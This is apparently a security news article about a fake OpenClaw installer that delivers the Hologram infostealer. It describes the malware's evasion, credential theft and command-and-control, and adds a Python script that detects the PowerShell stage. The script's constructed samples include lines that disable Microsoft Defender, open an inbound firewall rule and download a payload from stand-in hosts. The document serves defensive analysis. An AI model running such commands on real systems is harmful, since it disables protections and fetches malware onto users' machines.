
Fake OpenClaw Installer Aims at Crypto Wallets and Password Managers


Cybersecurity Alert: New Infostealer Framework Hologram Targets Crypto Wallets

A malware campaign is using a fake OpenClaw installer to distribute Hologram, a modular Rust-based infostealer framework. Hologram is built to harvest credentials from more than 250 browser extensions for crypto wallets and password managers, and it hides its command-and-control traffic behind legitimate cloud and messaging services so that it blends in with normal outbound traffic.

The Deceptive Installer

The investigation traced the lure to a website that delivers a malicious archive named OpenClaw_x64.7z. The archive contains a roughly 130 MB Rust-compiled executable, OpenClaw_x64.exe, padded with bogus documentation so that it looks like a real installer. The bloated size is not only cosmetic: it pushes the file past the size thresholds at which many antivirus engines stop scanning and past the upload limits of common sandboxes.

The executable's PE version information claims version v1.7.16, the product name "Hologram" and the description "Decoy entity generator for tactical misdirection." The description reads as a wink at analysts rather than a real product label; together with the behaviour described below, it leaves little doubt about what the binary is for.

Netskope has been tracking the component as a previously undocumented Rust dropper active since at least February 2026, and has linked it to the broader fake OpenClaw campaign documented earlier by Huntress.

The Trickery Behind the Malware

The operators run a convincing copy of the OpenClaw download site at openclaw-installer.com, registered in March 2026 on Chinese infrastructure and fronted by Cloudflare. The fake site links to a typosquatted GitHub organization, openclaw-install/openclaw-installer, rather than the legitimate openclaw/openclaw project, so a visitor who checks for a GitHub link sees one.

Before doing anything harmful, the dropper runs layered anti-virtual-machine checks: it inspects BIOS strings, looks for DLLs that sandboxes inject, checks MAC address prefixes (a common way to spot VMware and VirtualBox adapters) and matches the current username against a blocklist. It then profiles the host's GPU, CPU core count, RAM, disk size, running processes and screen resolution, since analysis VMs tend to have small, uniform hardware profiles that differ from a real workstation.

The malware also uses a "mouse gate": it does not proceed until it observes real mouse movement. Many automated sandboxes never generate user input, so the gate stalls them until their analysis window expires, while a real user passes through within seconds. Sandboxes that simulate input, or analysts interacting by hand, defeat this check, which is why it is layered with the hardware and environment checks above rather than relied on alone.

Execution and Information Theft

Once the checks indicate a real user's machine, Hologram decodes and runs an obfuscated PowerShell payload. The payload disables Microsoft Defender, adds inbound firewall rules for specific ports, fetches a password from a dead-drop URL and uses that password to download and unpack a password-protected 7z archive containing six stage-two binaries. Keeping the password separate from the archive means the archive on its own cannot be scanned or unpacked by anyone who did not also retrieve the dead drop.
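The tamper steps just described leave a clear trail in PowerShell script block logging (event ID 4104) if it is enabled. The following is an added example of triage logic over such events, written for this article; it is not code from the campaign or from Netskope. The event texts are constructed, and the concrete commands it looks for (Set-MpPreference, New-NetFirewallRule, netsh, 7z.exe) are assumptions: the article names the actions, not the exact cmdlets the payload runs.

```python
"""Flag PowerShell script blocks matching the stage-one behaviour described above:
Defender disablement, inbound firewall rule creation, a remote fetch and
extraction of a password-protected 7z archive.

Added example for this article, not code from the campaign or from Netskope.
Event texts are constructed; the cmdlets matched are assumed, not confirmed.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field

# (name, pattern, weight). Case-insensitive because PowerShell is; re.S so a
# multi-line script block still matches.
RULES = [
    ("defender_disable",
     re.compile(r"Set-MpPreference\b.*-Disable\w+\s+(?:\$true|1)\b", re.I | re.S), 5),
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b", re.I | re.S), 3),
    ("inbound_firewall_rule",
     re.compile(r"New-NetFirewallRule\b.*-Direction\s+Inbound\b"
                r"|netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\bdir=in\b", re.I | re.S), 4),
    ("remote_fetch",
     re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|DownloadFile|Start-BitsTransfer",
                re.I), 2),
    ("protected_archive_extract",
     re.compile(r"\b7z(?:a|r)?(?:\.exe)?\s+[xe]\b.*\s-p\S+", re.I | re.S), 3),
]
THRESHOLD = 5  # a single Defender tamper is enough to escalate

# -EncodedCommand and its abbreviations carry a base64-encoded UTF-16LE script.
ENCODED = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text: str) -> list[str]:
    """Return the UTF-16LE scripts hidden behind -EncodedCommand in text."""
    decoded = []
    for match in ENCODED.finditer(text):
        try:
            decoded.append(base64.b64decode(match.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not really base64 UTF-16LE; ignore it
    return decoded


@dataclass
class Finding:
    event_id: str
    score: int = 0
    hits: list[str] = field(default_factory=list)


def analyze_script_block(event_id: str, text: str) -> Finding:
    """Score one script block (e.g. the ScriptBlockText of a 4104 event)."""
    layers = [text]
    i = 0
    while i < len(layers):  # unwrap nested -EncodedCommand layers as well
        layers.extend(decode_encoded_commands(layers[i]))
        i += 1
    finding = Finding(event_id)
    for name, pattern, weight in RULES:
        if any(pattern.search(layer) for layer in layers):
            finding.hits.append(name)
            finding.score += weight
    return finding


def triage(events: dict[str, str]) -> dict[str, Finding]:
    return {eid: analyze_script_block(eid, text) for eid, text in events.items()}


def flagged(events: dict[str, str]) -> list[str]:
    """Event IDs whose score reaches THRESHOLD, in input order."""
    return [eid for eid, f in triage(events).items() if f.score >= THRESHOLD]


# Constructed sample script blocks; none of this text comes from the real campaign.
SAMPLE_EVENTS = {
    # Benign admin activity: reads Defender state, adds an outbound rule.
    "evt-1": "Get-MpPreference | Select-Object DisableRealtimeMonitoring",
    "evt-2": 'New-NetFirewallRule -DisplayName "Git Sync" -Direction Outbound -Action Allow -Protocol TCP -RemotePort 443',
    # Modelled on the stage-one chain described in the article (hosts and ports are made up).
    "evt-3": (
        "Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true; "
        'netsh advfirewall firewall add rule name="svc" dir=in action=allow protocol=TCP localport=4443; '
        "$pw = (Invoke-WebRequest -UseBasicParsing https://dead-drop.example/p.txt).Content; "
        "Invoke-WebRequest https://cdn.example/stage2.7z -OutFile $env:TEMP\\s2.7z; "
        "& $env:TEMP\\7z.exe x $env:TEMP\\s2.7z -p$pw -o$env:TEMP\\s2"
    ),
    # The same Defender tamper hidden behind -EncodedCommand.
    "evt-4": "powershell.exe -nop -w hidden -EncodedCommand " + base64.b64encode(
        "Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16-le")).decode(),
}

if __name__ == "__main__":
    for eid, finding in triage(SAMPLE_EVENTS).items():
        print(eid, finding.score, finding.hits)
```

The decoding step matters more than the regexes: a payload that arrives as `-EncodedCommand` shows up in 4104 logs both as the wrapper and as the decoded block, but a detection that only inspects the wrapper misses it. Treat the weights as a starting point and tune them against your own administrators' baseline; the Defender rule deliberately ignores reads and `$false` assignments so that routine configuration audits do not fire.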

The second stage, labelled stealth_packer internally, consists of six Rust components that maintain persistence and command-and-control channels and deliver further payloads filelessly.

While this runs, Hologram shows a GUI installer built with the Iced/wgpu framework, complete with User Account Control prompts. The prompts reinforce the illusion of a normal installation and also obtain the elevation that the Defender and firewall changes require.

Command-and-Control Infrastructure

Modules such as virtnetwork.exe and svc_service.exe beacon over HTTPS to a hijacked subdomain belonging to a Brazilian law firm and to a DigitalOcean-hosted IP address, using the ports the PowerShell stage opened. Another component, onedrive_sync.exe, decrypts and runs embedded payloads entirely in memory using the memexec crate and direct NT system calls; issuing syscalls directly rather than through the documented Win32 API sidesteps the user-mode API hooks that many EDR products rely on.

During installation the framework downloads a browser extension target list from an Azure DevOps organization controlled by the attackers. The file carries a .7z extension but is plaintext. It lists crypto wallet extensions such as MetaMask, Phantom and Coinbase alongside password managers and authenticator extensions such as Bitwarden and Google Authenticator. Because the list lives in a Git repository rather than inside the binaries, the operators can change targets without recompiling or redistributing the malware, which also means that the set of targeted extension IDs is not a stable indicator for defenders.

svc_service.exe also uses the clroxide Rust crate to host the .NET Common Language Runtime inside the native Rust process: it loads mscoree.dll and executes embedded .NET assemblies in memory, so no managed binary is ever written to disk for a scanner to inspect.

Mitigation Challenges

Hologram persists through several redundant mechanisms: registry Run keys, hijacking of the Winlogon UserInit value, scheduled tasks and fallback droppers fetched via Telegram, so removing one foothold does not clean the host. Command-and-control runs over a mix of hijacked domains, DigitalOcean infrastructure and configuration delivered through Telegram.

The operators also route Telegram bot traffic through Hookdeck, a webhook relay service, as an application-layer relay. This is reportedly the first publicly documented use of that platform for command and control, and it means the beacons terminate at a legitimate SaaS endpoint rather than at the Telegram API directly.

Because the domains rotate continually and the cloud endpoints change without any change to the binaries, blocking individual IPs and domains buys defenders only temporary relief.

Conclusion

The campaign shows why organizations need to treat developer tooling and browser extensions as part of their attack surface. Hologram hides Rust binaries and live command and control inside trusted services, so effective defense depends on application-layer inspection of traffic to those services, tight governance of which browser extensions may be installed, and behavioral detection that catches credential harvesting from extension storage regardless of which domains the malware happens to use today.

